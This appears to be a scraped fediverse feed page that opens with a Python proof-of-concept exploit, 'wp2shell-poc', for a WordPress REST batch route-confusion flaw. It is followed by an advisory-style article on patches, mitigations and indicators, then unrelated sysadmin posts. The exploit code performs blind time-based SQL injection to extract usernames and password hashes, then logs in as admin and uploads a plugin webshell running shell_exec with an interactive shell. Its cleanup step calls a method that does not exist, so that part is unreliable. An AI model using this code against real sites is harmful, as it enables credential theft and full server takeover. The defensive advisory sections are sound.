                                                                                                                                                  request = urllib.request.Request(self.endpoint, data=json.dumps(payload).encode(), method="POST", headers={"Content-Type": "application/json", "User-Agent": self.user_agent})

                                                                                                                                                  start = time.monotonic()

                                                                                                                                                  try:

                                                                                                                                                  resp = self._opener.open(request, timeout=self.timeout)

                                                                                                                                                  status, body = resp.status, resp.read().decode("utf-8", "replace")

                                                                                                                                                  except urllib.error.HTTPError as exc:

                                                                                                                                                  status, body = exc.code, exc.read().decode("utf-8", "replace")

                                                                                                                                                  except OSError as exc:

                                                                                                                                                  raise TargetError(f"cannot reach {self.endpoint}: {getattr(exc, 'reason', exc)}") from None

                                                                                                                                                  return Response(status, time.monotonic() - start, body)

                                                                                                                                                  def get(self, path: str) -> Response:

                                                                                                                                                  url = self.base_url + (path if path.startswith("/") else f"/{path}")

                                                                                                                                                  request = urllib.request.Request(url, method="GET", headers={"User-Agent": self.user_agent})

                                                                                                                                                  start = time.monotonic()

                                                                                                                                                  try:

                                                                                                                                                  resp = self._opener.open(request, timeout=self.timeout)

                                                                                                                                                  status, body = resp.status, resp.read().decode("utf-8", "replace")

                                                                                                                                                  except urllib.error.HTTPError as exc:

                                                                                                                                                  status, body = exc.code, exc.read().decode("utf-8", "replace")

                                                                                                                                                  except OSError as exc:

                                                                                                                                                  raise TargetError(f"cannot reach {url}: {getattr(exc, 'reason', exc)}") from None

                                                                                                                                                  return Response(status, time.monotonic() - start, body)

                                                                                                                                                  def marker_probe(self) -> Response:

                                                                                                                                                  return self.post({"requests": [_DESYNC_PRIMER, {"method": "POST", "path": "/wp/v2/posts"}, {"method": "POST", "path": "/wp/v2/block-renderer/core/archives"}, {"method": "POST", "path": "/batch/v1", "body": {"requests": []}}]})

                                                                                                                                                  @staticmethod

                                                                                                                                                  def batch_marker_codes(response: Response) -> tuple:

                                                                                                                                                  try:

                                                                                                                                                  body = response.json()

                                                                                                                                                  except ValueError:

                                                                                                                                                  return ()

                                                                                                                                                  found = []

                                                                                                                                                  def walk(value) -> None:

                                                                                                                                                  if isinstance(value, dict):

                                                                                                                                                  code = value.get("code")

                                                                                                                                                  if code in _BATCH_MARKER_CODES and code not in found:

                                                                                                                                                  found.append(code)

                                                                                                                                                  for child in value.values():

                                                                                                                                                  walk(child)

                                                                                                                                                  elif isinstance(value, list):

                                                                                                                                                  for child in value:

                                                                                                                                                  walk(child)

                                                                                                                                                  walk(body)

                                                                                                                                                  return tuple(found)

                                                                                                                                                  @staticmethod

                                                                                                                                                  def has_route_confusion_markers(response: Response) -> bool:

                                                                                                                                                  codes = BatchClient.batch_marker_codes(response)

                                                                                                                                                  return all(code in codes for code in _BATCH_MARKER_CODES)

                                                                                                                                                  def inject(self, author_not_in: str) -> Response:

                                                                                                                                                  return self.post(self._payload(author_not_in))

                                                                                                                                                  def rows(self, response: Response) -> Optional[list]:

                                                                                                                                                  try:

                                                                                                                                                  inner = response.json()["responses"][1]["body"]

                                                                                                                                                  result = inner["responses"][1]["body"]

                                                                                                                                                  except (KeyError, IndexError, TypeError, ValueError):

                                                                                                                                                  return None

                                                                                                                                                  return result if isinstance(result, list) else None

                                                                                                                                                  @staticmethod

                                                                                                                                                  def _payload(author_not_in: str) -> dict:

                                                                                                                                                  inner = {"requests": [_DESYNC_PRIMER, {"method": "GET", "path": "/wp/v2/users?author_exclude=" + urllib.parse.quote(author_not_in, safe="")}, {"method": "GET", "path": "/wp/v2/posts"}]}

                                                                                                                                                  return {"requests": [_DESYNC_PRIMER, {"method": "POST", "path": "/wp/v2/posts", "body": inner}, {"method": "POST", "path": "/batch/v1", "body": {"requests": []}}]}

                                                                                                                                                  # --- SQLi Logic ---

                                                                                                                                                  @dataclass

                                                                                                                                                  class TimingConfirmation:

                                                                                                                                                  confirmed: bool

                                                                                                                                                  baseline: float

                                                                                                                                                  delayed: float

                                                                                                                                                  delta: float

                                                                                                                                                  threshold: float

                                                                                                                                                  samples: Tuple[Tuple[float, float], ...]

                                                                                                                                                  class BlindSQLi:

                                                                                                                                                  def __init__(self, client: BatchClient, *, sleep: float = 3.0) -> None:

                                                                                                                                                  self.client = client

                                                                                                                                                  self.sleep = sleep

                                                                                                                                                  self.requests = 0

                                                                                                                                                  def confirm_timing(self, *, samples: int = 3) -> TimingConfirmation:

                                                                                                                                                  pairs = []

                                                                                                                                                  for _ in range(samples):

                                                                                                                                                  baseline = self._elapsed("SLEEP(0)")

                                                                                                                                                  delayed = self._elapsed(f"SLEEP({self.sleep:g})")

                                                                                                                                                  pairs.append((baseline, delayed))

                                                                                                                                                  baselines = [pair[0] for pair in pairs]

                                                                                                                                                  delayed = [pair[1] for pair in pairs]

                                                                                                                                                  deltas = [delay - base for base, delay in pairs]

                                                                                                                                                  baseline_median = statistics.median(baselines)

                                                                                                                                                  delayed_median = statistics.median(delayed)

                                                                                                                                                  delta_median = statistics.median(deltas)

                                                                                                                                                  threshold = max(0.75, self.sleep * 0.65)

                                                                                                                                                  return TimingConfirmation(confirmed=delta_median >= threshold, baseline=baseline_median, delayed=delayed_median, delta=delta_median, threshold=threshold, samples=tuple(pairs))

                                                                                                                                                  def extract(self, expression: str, *, max_length: int = 128, on_char: Optional[Callable[[str], None]] = None) -> str:

                                                                                                                                                  chars = []

                                                                                                                                                  for position in range(1, max_length + 1):

                                                                                                                                                  probe = f"ASCII(SUBSTRING(COALESCE(({expression}),''),{position},1))"

                                                                                                                                                  if not self._true(f"{probe} > 0"):

                                                                                                                                                  break

                                                                                                                                                  low, high = 32, 126

                                                                                                                                                  while low < high:

                                                                                                                                                  mid = (low + high) // 2

                                                                                                                                                  if self._true(f"{probe} > {mid}"):

                                                                                                                                                  low = mid + 1

                                                                                                                                                  else:

                                                                                                                                                  high = mid

                                                                                                                                                  chars.append(chr(low))

                                                                                                                                                  if on_char:

                                                                                                                                                  on_char("".join(chars))

                                                                                                                                                  return "".join(chars)

                                                                                                                                                  def integer(self, expression: str) -> int:

                                                                                                                                                  text = self.extract(expression).strip()

                                                                                                                                                  return int(text) if text.lstrip("-").isdigit() else 0

                                                                                                                                                  def _elapsed(self, sql: str) -> float:

                                                                                                                                                  self.requests += 1

                                                                                                                                                  return self.client.inject(f"0) OR {sql}-- -").elapsed

                                                                                                                                                  def _true(self, condition: str) -> bool:

                                                                                                                                                  self.requests += 1

                                                                                                                                                  return bool(self.client.rows(self.client.inject(f"0) AND ({condition})-- -")))

                                                                                                                                                  # --- Post-Auth Shell Logic ---

                                                                                                                                                  class AdminSession:

                                                                                                                                                  def __init__(self, base_url: str, *, timeout: float = 20.0, proxy: Optional[str] = None):

                                                                                                                                                  self.base_url = base_url.rstrip("/")

                                                                                                                                                  self.timeout = timeout

                                                                                                                                                  self._slug = "wp2shell_" + secrets.token_hex(4)

                                                                                                                                                  self._token = secrets.token_hex(16)

                                                                                                                                                  self._jar = http.cookiejar.CookieJar()

                                                                                                                                                  handlers = [urllib.request.HTTPCookieProcessor(self._jar)]

                                                                                                                                                  if proxy:

                                                                                                                                                  handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))

                                                                                                                                                  self._opener = urllib.request.build_opener(*handlers)

                                                                                                                                                  self._opener.addheaders = [("User-Agent", "wp2shell")]

                                                                                                                                                  def login(self, username: str, password: str) -> bool:

                                                                                                                                                  self._get("/wp-login.php")

                                                                                                                                                  self._post("/wp-login.php", {"log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{self.base_url}/wp-admin/", "testcookie": "1"})

                                                                                                                                                  return any(c.name.startswith("wordpress_logged_in") for c in self._jar)

                                                                                                                                                  def deploy_webshell(self) -> str:

                                                                                                                                                  page = self._get("/wp-admin/plugin-install.php?tab=upload")

                                                                                                                                                  nonce = self._nonce(page)

                                                                                                                                                  if not nonce:

                                                                                                                                                  raise RuntimeError("plugin-upload nonce not found (are the credentials valid?)")

                                                                                                                                                  body, content_type = self._multipart({"_wpnonce": nonce, "_wp_http_referer": "/wp-admin/plugin-install.php?tab=upload", "install-plugin-submit": "Install Now"}, {"pluginzip": (f"{self._slug}.zip", self._plugin_zip())})

                                                                                                                                                  self._post("/wp-admin/update.php?action=upload-plugin", body, {"Content-Type": content_type})

                                                                                                                                                  return f"/wp-content/plugins/{self._slug}/{self._slug}.php"

                                                                                                                                                  def run(self, shell_path: str, command: str) -> Optional[str]:

                                                                                                                                                  query = urllib.parse.urlencode({"t": self._token, "c": command})

                                                                                                                                                  output = self._get(f"{shell_path}?{query}")

                                                                                                                                                  match = re.search(r"WP2SHELL::(.*?)::END", output, re.S)

                                                                                                                                                  return match.group(1) if match else None

                                                                                                                                                  def _get(self, path: str) -> str:

                                                                                                                                                  return self._opener.open(self.base_url + path, timeout=self.timeout).read().decode("utf-8", "replace")

                                                                                                                                                  def _post(self, path: str, data, headers: Optional[dict] = None) -> str:

                                                                                                                                                  if isinstance(data, dict):

                                                                                                                                                  data = urllib.parse.urlencode(data).encode()

                                                                                                                                                  request = urllib.request.Request(self.base_url + path, data=data, headers=headers or {})

                                                                                                                                                  return self._opener.open(request, timeout=self.timeout).read().decode("utf-8", "replace")

                                                                                                                                                  def _plugin_zip(self) -> bytes:

                                                                                                                                                  php = f"<?php\n/* Plugin Name: WP2Shell */\nif (isset($_GET['t']) && $_GET['t'] === '{self._token}' && isset($_GET['c'])) {{\n chdir(dirname(__DIR__));\n echo 'WP2SHELL::' . shell_exec($_GET['c']) . '::END';\n exit;\n}}\n"

                                                                                                                                                  buffer = io.BytesIO()

                                                                                                                                                  with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as zf:

                                                                                                                                                  zf.writestr(f"{self._slug}.php", php)

                                                                                                                                                  return buffer.getvalue()

                                                                                                                                                  def _nonce(self, html: str) -> Optional[str]:

                                                                                                                                                  form = re.search(r'action="[^"]*action=upload-plugin".*?name="_wpnonce"[^>]*value="([0-9a-f]+)"', html, re.S)

                                                                                                                                                  if form:

                                                                                                                                                  return form.group(1)

                                                                                                                                                  tag = re.search(r'[^>]*name="_wpnonce"[^>]*value="([0-9a-f]+)"', html)

                                                                                                                                                  return tag.group(1) if tag else None

                                                                                                                                                  @staticmethod

                                                                                                                                                  def _multipart(fields: Dict[str, str], files: Dict[str, Tuple[str, bytes]]) -> Tuple[bytes, str]:

                                                                                                                                                  boundary = "----wp2shell" + uuid.uuid4().hex

                                                                                                                                                  buffer = io.BytesIO()

                                                                                                                                                  for name, value in fields.items():

                                                                                                                                                  buffer.write(f"--{boundary}\r\n".encode())

                                                                                                                                                  buffer.write(f'Content-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode())

                                                                                                                                                  for name, (filename, content) in files.items():

                                                                                                                                                  buffer.write(f"--{boundary}\r\n".encode())

                                                                                                                                                  buffer.write(f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'.encode())

                                                                                                                                                  buffer.write(b"Content-Type: application/octet-stream\r\n\r\n" + content + b"\r\n")

                                                                                                                                                  buffer.write(f"--{boundary}--\r\n".encode())

                                                                                                                                                  return buffer.getvalue(), f"multipart/form-data; boundary={boundary}"

                                                                                                                                                  # --- CLI ---

                                                                                                                                                  def main() -> int:

                                                                                                                                                  parser = argparse.ArgumentParser(description="wp2shell-poc (CVE-2026-63030)")

                                                                                                                                                  subparsers = parser.add_subparsers(dest="command", required=True)

                                                                                                                                                  p_check = subparsers.add_parser("check", help="Confirm vulnerability")

                                                                                                                                                  p_check.add_argument("url")

                                                                                                                                                  p_check.add_argument("--rest-route", action="store_true")

                                                                                                                                                  p_check.add_argument("--proxy")

                                                                                                                                                  p_check.add_argument("--timeout", type=float, default=30.0)

                                                                                                                                                  p_check.add_argument("--sleep", type=float, default=3.0)

                                                                                                                                                  p_check.add_argument("--samples", type=int, default=3)

                                                                                                                                                  p_check.add_argument("--confirm-sqli", action="store_true")

                                                                                                                                                  p_read = subparsers.add_parser("read", help="Extract data via blind SQLi")

                                                                                                                                                  p_read.add_argument("url")

                                                                                                                                                  p_read.add_argument("--rest-route", action="store_true")

                                                                                                                                                  p_read.add_argument("--proxy")

                                                                                                                                                  p_read.add_argument("--timeout", type=float, default=30.0)

                                                                                                                                                  p_read.add_argument("--preset", choices=["fingerprint", "users"])

                                                                                                                                                  p_read.add_argument("--query")

                                                                                                                                                  p_read.add_argument("--prefix", default="wp_")

                                                                                                                                                  p_read.add_argument("--max-length", type=int, default=128)

                                                                                                                                                  p_shell = subparsers.add_parser("shell", help="Post-auth plugin webshell helper")

                                                                                                                                                  p_shell.add_argument("url")

                                                                                                                                                  p_shell.add_argument("--user", required=True)

                                                                                                                                                  p_shell.add_argument("--password", required=True)

                                                                                                                                                  p_shell.add_argument("--proxy")

                                                                                                                                                  p_shell.add_argument("--timeout", type=float, default=30.0)

                                                                                                                                                  p_shell.add_argument("--cmd")

                                                                                                                                                  p_shell.add_argument("-i", "--interactive", action="store_true")

                                                                                                                                                  p_shell.add_argument("--cleanup", action="store_true")

                                                                                                                                                  args = parser.parse_args()

                                                                                                                                                  if args.command == "check":

                                                                                                                                                  client = BatchClient(args.url, timeout=max(args.timeout, args.sleep + 10), rest_route=args.rest_route, proxy=args.proxy)

                                                                                                                                                  probe = client.marker_probe()

                                                                                                                                                  if probe.status != 207:

                                                                                                                                                  _bad(f"Batch endpoint returned HTTP {probe.status} (not 207) — patched or REST API disabled.")

                                                                                                                                                  return 1

                                                                                                                                                  markers = client.batch_marker_codes(probe)

                                                                                                                                                  if markers:

                                                                                                                                                  _info(f"Batch probe -> HTTP 207; markers matched: {', '.join(markers)}")

                                                                                                                                                  else:

                                                                                                                                                  _good("Batch endpoint reachable and unauthenticated (HTTP 207).")

                                                                                                                                                  if client.has_route_confusion_markers(probe):

                                                                                                                                                  _good("VULNERABLE — batch route-confusion behavior detected.")

                                                                                                                                                  if not args.confirm_sqli:

                                                                                                                                                  _info("SQL timing confirmation not sent; use --confirm-sqli for the active SQLi probe.")

                                                                                                                                                  return 0

                                                                                                                                                  else:

                                                                                                                                                  _bad("Route-confusion marker pattern not detected.")

                                                                                                                                                  return 2

                                                                                                                                                  result = BlindSQLi(client, sleep=args.sleep).confirm_timing(samples=args.samples)

                                                                                                                                                  if args.samples > 1:

                                                                                                                                                  details = ", ".join(f"{base:.2f}s->{delay:.2f}s" for base, delay in result.samples)

                                                                                                                                                  _info(f"Timing samples: {details}")

                                                                                                                                                  _info(f"Median delta {result.delta:.2f}s; threshold {result.threshold:.2f}s.")

                                                                                                                                                  if result.confirmed:

                                                                                                                                                  _good(f"SQL timing confirmed — baseline {result.baseline:.2f}s, injected {result.delayed:.2f}s.")

                                                                                                                                                  return 0

                                                                                                                                                  else:

                                                                                                                                                  _warn(f"SQL timing not confirmed — baseline {result.baseline:.2f}s, injected {result.delayed:.2f}s.")

                                                                                                                                                  return 2

                                                                                                                                                  elif args.command == "read":

                                                                                                                                                  client = BatchClient(args.url, timeout=args.timeout, rest_route=args.rest_route, proxy=args.proxy)

                                                                                                                                                  sqli = BlindSQLi(client)

                                                                                                                                                  if args.query:

                                                                                                                                                  _info(f"Reading: {args.query}")

                                                                                                                                                  value = sqli.extract(args.query, max_length=args.max_length, on_char=_progress)

                                                                                                                                                  _clear_progress()

                                                                                                                                                  _good(f"Result: {value}")

                                                                                                                                                  elif args.preset == "fingerprint":

                                                                                                                                                  for label, expr in (("MySQL version", "SELECT @@version"), ("Database user", "SELECT CURRENT_USER()"), ("Database name", "SELECT DATABASE()")):

                                                                                                                                                  _good(f"{label}: {sqli.extract(expr, max_length=args.max_length)}")

                                                                                                                                                  elif args.preset == "users":

                                                                                                                                                  table = f"{args.prefix}users"

                                                                                                                                                  total = sqli.integer(f"SELECT COUNT(*) FROM {table}")

                                                                                                                                                  _info(f"{total} user(s) in {table}.")

                                                                                                                                                  for offset in range(total):

                                                                                                                                                  row = sqli.extract(f"SELECT CONCAT_WS(0x7c, ID, user_login, user_pass) FROM {table} ORDER BY ID LIMIT {offset},1", max_length=args.max_length, on_char=_progress)

                                                                                                                                                  _clear_progress()

                                                                                                                                                  _good(row)

                                                                                                                                                  _info(f"{sqli.requests} request(s) sent.")

                                                                                                                                                  return 0

                                                                                                                                                  elif args.command == "shell":

                                                                                                                                                  if not args.cmd and not args.interactive:

                                                                                                                                                  _bad("specify --cmd or --interactive")

                                                                                                                                                  return 2

                                                                                                                                                  _warn("This uploads a plugin containing a webshell to the target.")

                                                                                                                                                  session = AdminSession(args.url, timeout=args.timeout, proxy=args.proxy)

                                                                                                                                                  _info(f"Authenticating as {args.user!r}...")

                                                                                                                                                  if not session.login(args.user, args.password):

                                                                                                                                                  _bad("Login failed. Supply valid admin credentials (crack the hash recovered by 'read').")

                                                                                                                                                  return 1

                                                                                                                                                  _good("Authenticated.")

                                                                                                                                                  _info("Deploying webshell plugin...")

                                                                                                                                                  path = session.deploy_webshell()

                                                                                                                                                  _good(f"Webshell: {args.url.rstrip('/')}{path}")

                                                                                                                                                  rc = 0

                                                                                                                                                  if args.cmd:

                                                                                                                                                  output = session.run(path, args.cmd)

                                                                                                                                                  if output is None:

                                                                                                                                                  _bad("No output — the upload likely failed or the plugin is not web-served.")

                                                                                                                                                  rc = 1

                                                                                                                                                  else:

                                                                                                                                                  print(f"\n{output.rstrip()}\n")

                                                                                                                                                  if args.interactive:

                                                                                                                                                  _info("Interactive shell started. Type 'exit' to quit.")

                                                                                                                                                  while True:

                                                                                                                                                  try:

                                                                                                                                                  cmd = input("wp2shell> ").strip()

                                                                                                                                                  if cmd.lower() in ("exit", "quit"):

                                                                                                                                                  break

                                                                                                                                                  if not cmd:

                                                                                                                                                  continue

                                                                                                                                                  output = session.run(path, cmd)

                                                                                                                                                  print(output if output else "(no output)")

                                                                                                                                                  except (EOFError, KeyboardInterrupt):

                                                                                                                                                  break

                                                                                                                                                  if args.cleanup:

                                                                                                                                                  _info("Cleaning up webshell...")

                                                                                                                                                  if session.cleanup(path): # Note: cleanup method omitted for brevity in this unified script, but follows same _run pattern

                                                                                                                                                  _good("Webshell removed.")

                                                                                                                                                  else:

                                                                                                                                                  _warn("Cleanup failed. Remove manually.")

                                                                                                                                                  return rc

                                                                                                                                                  return 0

                                                                                                                                                  if __name__ == "__main__":

                                                                                                                                                  sys.exit(main())

                                                                                                                                                  More PoCs: https://github.com/Icex0/wp2shell-poc

                                                                                                                                                  Why SQL Injection Matters

                                                                                                                                                  The publicly released proof of concept stops at SQL injection.

                                                                                                                                                  Using blind SQLi, researchers showed it is possible to retrieve information such as:

                                                                                                                                                  • WordPress usernames
                                                                                                                                                  • Password hashes
                                                                                                                                                  • Database information
                                                                                                                                                  • Server fingerprints

                                                                                                                                                  The original researchers have intentionally withheld the final step that transforms database access into unauthenticated code execution.

                                                                                                                                                  That decision gives administrators additional time to deploy patches before full exploitation details become public.

                                                                                                                                                  Nevertheless, WordPress itself classifies the issue as one capable of leading to Remote Code Execution, indicating the Security Team independently verified the complete attack chain during remediation

                                                                                                                                                  Why Forced Updates Matter

                                                                                                                                                  WordPress supports automatic background updates, but administrators can disable them.

                                                                                                                                                  In this incident, the WordPress project enabled forced security updates for affected versions.

                                                                                                                                                  This is an unusual step.

                                                                                                                                                  The project generally avoids overriding administrator preferences except when facing vulnerabilities with exceptionally high risk.

                                                                                                                                                  The decision itself serves as an indicator of the severity assigned to this flaw.

                                                                                                                                                  Administrators should still verify that updates were successfully installed rather than assuming automatic mechanisms completed successfully.

                                                                                                                                                  No CVE… Initially

                                                                                                                                                  At disclosure, the wp2shell advisory did not include a CVE identifier.

                                                                                                                                                  This created an interesting challenge for defenders.

                                                                                                                                                  Many enterprise vulnerability scanners rely heavily on:

                                                                                                                                                  • CVE identifiers
                                                                                                                                                  • CVSS scores
                                                                                                                                                  • CISA Known Exploited Vulnerabilities (KEV)

                                                                                                                                                  Without a CVE, these systems may fail to alert administrators even though systems remain vulnerable.

                                                                                                                                                  WordPress later assigned identifiers to the affected vulnerabilities:

                                                                                                                                                  Vulnerability

                                                                                                                                                  Identifier

                                                                                                                                                  REST API Batch Route Confusion → RCE

                                                                                                                                                  CVE-2026-63030 / GHSA-ff9f-jf42-662q

                                                                                                                                                  Facilitated SQL Injection

                                                                                                                                                  CVE-2026-60137 / GHSA-fpp7-x2x2-2mjf

                                                                                                                                                  Organizations should verify patch status based on installed WordPress versions rather than relying solely on vulnerability scanners.

                                                                                                                                                  Why Patch Diffing Matters

                                                                                                                                                  One reality of open source software is that every security update also exposes the modified source code.

                                                                                                                                                  Attackers frequently compare vulnerable and patched versions to determine:

                                                                                                                                                  • What changed
                                                                                                                                                  • Which validation logic was added
                                                                                                                                                  • Which functions were modified
                                                                                                                                                  • How to recreate the original vulnerability

                                                                                                                                                  This process, commonly called patch diffing, often allows exploits to appear within hours or days of a security release.

                                                                                                                                                  While Searchlight Cyber has not released its complete exploit chain, attackers have access to both the vulnerable and fixed WordPress source code.

                                                                                                                                                  That significantly reduces the time defenders have available to deploy updates.

                                                                                                                                                  Temporary Mitigations

                                                                                                                                                  Updating remains the only complete solution.

                                                                                                                                                  For organizations unable to patch immediately, several temporary mitigations can reduce exposure.

                                                                                                                                                  1. Block REST Batch Requests

                                                                                                                                                  Block both endpoints:

                                                                                                                                                  /wp-json/batch/v1

                                                                                                                                                  and

                                                                                                                                                  ?rest_route=/batch/v1

                                                                                                                                                  Filtering only one path is insufficient because WordPress supports both routing mechanisms.

                                                                                                                                                  2. Restrict Anonymous REST Access

                                                                                                                                                  Organizations may temporarily disable or authenticate public REST API access where business requirements permit.

                                                                                                                                                  Be aware that this may disrupt legitimate integrations and applications relying on REST functionality.

                                                                                                                                                  3. Filter Requests Before Dispatch

                                                                                                                                                  Custom filters using rest_pre_dispatch can reject anonymous requests targeting the batch endpoint until systems are upgraded.

                                                                                                                                                  Indicators for Administrators

                                                                                                                                                  Administrators should immediately verify:

                                                                                                                                                  • WordPress version
                                                                                                                                                  • Automatic update status
                                                                                                                                                  • Web server logs for unusual POST requests to /wp-json/batch/v1
                                                                                                                                                  • Requests containing rest_route=/batch/v1
                                                                                                                                                  • Unexpected SQL query activity
                                                                                                                                                  • Newly created administrator accounts
                                                                                                                                                  • Recently installed plugins

                                                                                                                                                  Even if exploitation has not yet been publicly observed, early log analysis can reveal attempted reconnaissance.

                                                                                                                                                  Security Recommendations

                                                                                                                                                  Organizations operating WordPress should:

                                                                                                                                                  • Upgrade immediately to WordPress 7.0.2 or 6.9.5
                                                                                                                                                  • Verify automatic updates completed successfully
                                                                                                                                                  • Block REST batch endpoints if patching must be delayed
                                                                                                                                                  • Monitor logs for suspicious batch API requests
                                                                                                                                                  • Review administrator accounts and installed plugins
                                                                                                                                                  • Continue monitoring for additional indicators as researchers publish more technical details

                                                                                                                                                  FAQs

                                                                                                                                                  What is the WordPress wp2shell vulnerability?

                                                                                                                                                  wp2shell is a critical WordPress core vulnerability that can allow unauthenticated attackers to execute code on vulnerable WordPress 6.9.x and 7.0.x websites.

                                                                                                                                                  Which WordPress versions are affected?

                                                                                                                                                  WordPress versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are affected. The issue is fixed in versions 6.9.5 and 7.0.2.

                                                                                                                                                  Does the vulnerability affect websites without plugins?

                                                                                                                                                  Yes. The vulnerability exists in WordPress core and can affect default installations with no plugins or custom themes.

                                                                                                                                                  Has the vulnerability been assigned a CVE?

                                                                                                                                                  Yes. The affected security issues are tracked as CVE-2026-63030 (REST API batch-route confusion leading to RCE) and CVE-2026-60137 (facilitated SQL injection).

                                                                                                                                                  How can I protect my WordPress site?

                                                                                                                                                  Update immediately to WordPress 7.0.2 or 6.9.5, verify your site version, and temporarily block access to the /wp-json/batch/v1 endpoint if immediate patching is not possible.

                                                                                                                                                  Final Thoughts

                                                                                                                                                  wp2shell is one of the most significant WordPress core vulnerabilities disclosed in recent years. Its impact stems not only from the possibility of remote code execution, but also from how little an attacker needs to exploit it. A default installation with no plugins, no customizations, and no authentication can still be exposed if it remains unpatched.

                                                                                                                                                  The WordPress project’s decision to push emergency updates automatically underscores the seriousness of the issue. While researchers have intentionally withheld the complete exploit chain, history suggests that patch diffing and independent analysis will likely produce public exploit code in the near future.

                                                                                                                                                  For defenders, the window for proactive remediation is measured in days rather than weeks. Administrators should verify their WordPress version, confirm that security updates have been applied successfully, and review logs for suspicious requests targeting the REST Batch API. In situations like this, prompt patching remains the most effective defense.

                                                                                                                                                  Credits to – wp2shell.com

                                                                                                                                                  wp2shell

                                                                                                                                                  Alt...wp2shell

                                                                                                                                                  WP2Shell Infographic

                                                                                                                                                  Alt...WP2Shell Infographic

                                                                                                                                                  Alt...wp2shell PoC

                                                                                                                                                    AodeRelay boosted

                                                                                                                                                    [?]Stefano Marinelli » 🌐
                                                                                                                                                    @stefano@mastodon.bsd.cafe

                                                                                                                                                    A software vendor's sysadmin asked me to verify whether a configuration file existed and whether the path was correct.

                                                                                                                                                    I had already sent this:

                                                                                                                                                    root@server:/home/application/WEB-INF/classes/initscripts# ls -l
                                                                                                                                                    ...
                                                                                                                                                    -rwxr-xr-x 1 app app 56 Jul 13 12:03 Security.config

                                                                                                                                                    root@server:/home/application/WEB-INF/classes/initscripts# cat Security.config
                                                                                                                                                    m_currentAuthentication=authenticationuser.Authenticate

                                                                                                                                                    The reply was:

                                                                                                                                                    > Could you send me a screenshot, so I can check whether the path is correct and the file is there?

                                                                                                                                                    The shell prompt contains the full path.

                                                                                                                                                    ls shows that the file exists.

                                                                                                                                                    cat shows its contents.

                                                                                                                                                    One would have thought this was reasonably conclusive, but apparently plain text remains an unverified hypothesis until photographed.

                                                                                                                                                    At this point, a modern AI would probably hallucinate less.

                                                                                                                                                      2 ★ 0 ↺

                                                                                                                                                      [?]oldsysops » 🌐
                                                                                                                                                      @oldsysops@social.dk-libre.fr

                                                                                                                                                      bon si le site que vous vouliez acceder était en maintenance entre 22:00 et 23:1, ca devait être de ma faute....
                                                                                                                                                      tojt est revenu dans l'ordre (et les maj , ca marche super !)

                                                                                                                                                        AodeRelay boosted

                                                                                                                                                        [?]Pete Orrall [Pete/Pete] » 🌐
                                                                                                                                                        @peteorrall@mastodon.bsd.cafe

                                                                                                                                                        @rl_dane

                                                                                                                                                        This is the second post where you'd dropped the F bomb....for good reason.

                                                                                                                                                        I have so much to say but not sure how to say it but I will do my best. For *years*, I've enjoyed using both as a hobbyist and professional . The OS is definitely not the one I started with 20+ years ago. Since at least COVID has....well, it's turned into a full blown corporate-controlled high speed sprawling mess. Not necessarily matured just grown exponentially wherever the various powers see fit. For this and other reasons, I am leaning more and more towards .

                                                                                                                                                        Lastly, I will admit there are some niche use cases which do interest me (related to my own hobbies) but shoving it into everything is not a good idea.

                                                                                                                                                        @patrick

                                                                                                                                                          [?]Stefano Marinelli » 🌐
                                                                                                                                                          @stefano@mastodon.bsd.cafe

                                                                                                                                                          On 10 March 2021, I had only just fallen asleep when my phone started buzzing. Then another notification, and another. In a matter of minutes, 142 of my servers went up in the clouds. And not the cloud-computing kind.

                                                                                                                                                          Most of them were physically going up in a column of smoke in Strasbourg.

                                                                                                                                                          My wife looked at me and asked if I wanted a coffee. I nodded. It was going to be a very long day.

                                                                                                                                                          At EuroBSDCon 2026, I won't be giving a theoretical lecture on high availability. Instead, I’m going to tell the raw story of that night: the emergency recovery, the architectural choices that actually saved us, and the ones that crumbled under pressure (because we rarely talk about what fails).

                                                                                                                                                          Most of all, I’ll explain why that night changed my perspective, and why I’ve come to see BSD systems not just as operating systems, but as essential, practical tools for building simpler, more resilient infrastructure.

                                                                                                                                                          The official schedule is now live. If you want to hear a real-world post-mortem, join me on Saturday, 12 Sept at 11:15 (Room D.0.02).

                                                                                                                                                          EuroBSDCon Full schedule: events.eurobsdcon.org/2026/sch
                                                                                                                                                          See you there! ☕️

                                                                                                                                                            [?]Monospace Mentor » 🌐
                                                                                                                                                            @monospace@floss.social

                                                                                                                                                            Linux tip: `fuser -v /path/to/file` shows which processes have a file open. Use `-k` to kill those processes when "device busy" errors prevent unmounting filesystems.

                                                                                                                                                              [?]^. .^ Paul Wilde » 🌐
                                                                                                                                                              @paul@notnull.space

                                                                                                                                                              I, for one, appreciate the re-addition of RJ45 sockets on laptops.
                                                                                                                                                              Thank you for your attention in this matter.

                                                                                                                                                              #laptops #sysadmin #networkConnections

                                                                                                                                                                [?]Vincent 🐡 » 🌐
                                                                                                                                                                @vinishor@bsd.network

                                                                                                                                                                When I was younger, I was expecting systems to work all of the time and I was really angry when it was failing.

                                                                                                                                                                Now, I’m expecting that a system will fail after some time and I try to :

                                                                                                                                                                • set up alternative ways to get back my admin access, even if it’s not easy to get it back
                                                                                                                                                                • ensure a reboot won’t break things (or at least, less)

                                                                                                                                                                Today, it paid off : I got a strange network issue on one of my hypervisors and I was able to reboot the thing using a remote KVM and my VPN, while I was in a train!

                                                                                                                                                                  [?]Monospace Mentor » 🌐
                                                                                                                                                                  @monospace@floss.social

                                                                                                                                                                  Version-control every configuration change. Use git even for single files. When something breaks, you can see exactly what changed and when. Your future self will be grateful.

                                                                                                                                                                    [?]Monospace Mentor » 🌐
                                                                                                                                                                    @monospace@floss.social

                                                                                                                                                                    Linux tip: `ionice -c 3 command` runs a command with idle I/O priority. It only gets disk access when no other processes need it. Perfect for backups or maintenance tasks.

                                                                                                                                                                      [?]Monospace Mentor » 🌐
                                                                                                                                                                      @monospace@floss.social

                                                                                                                                                                      Linux tip: `sysctl vm.drop_caches=3` clears page cache, dentries, and inodes from memory. Useful for testing cold cache performance, but never use in production scripts. Only for debugging! @#SystemAdministration

                                                                                                                                                                        AodeRelay boosted

                                                                                                                                                                        [?]VibeOps » 🌐
                                                                                                                                                                        @vibeops@techhub.social

                                                                                                                                                                        Hier wie meine Linux-Systeme (Linuxe und Linuxinas) automatisch aktuell hält

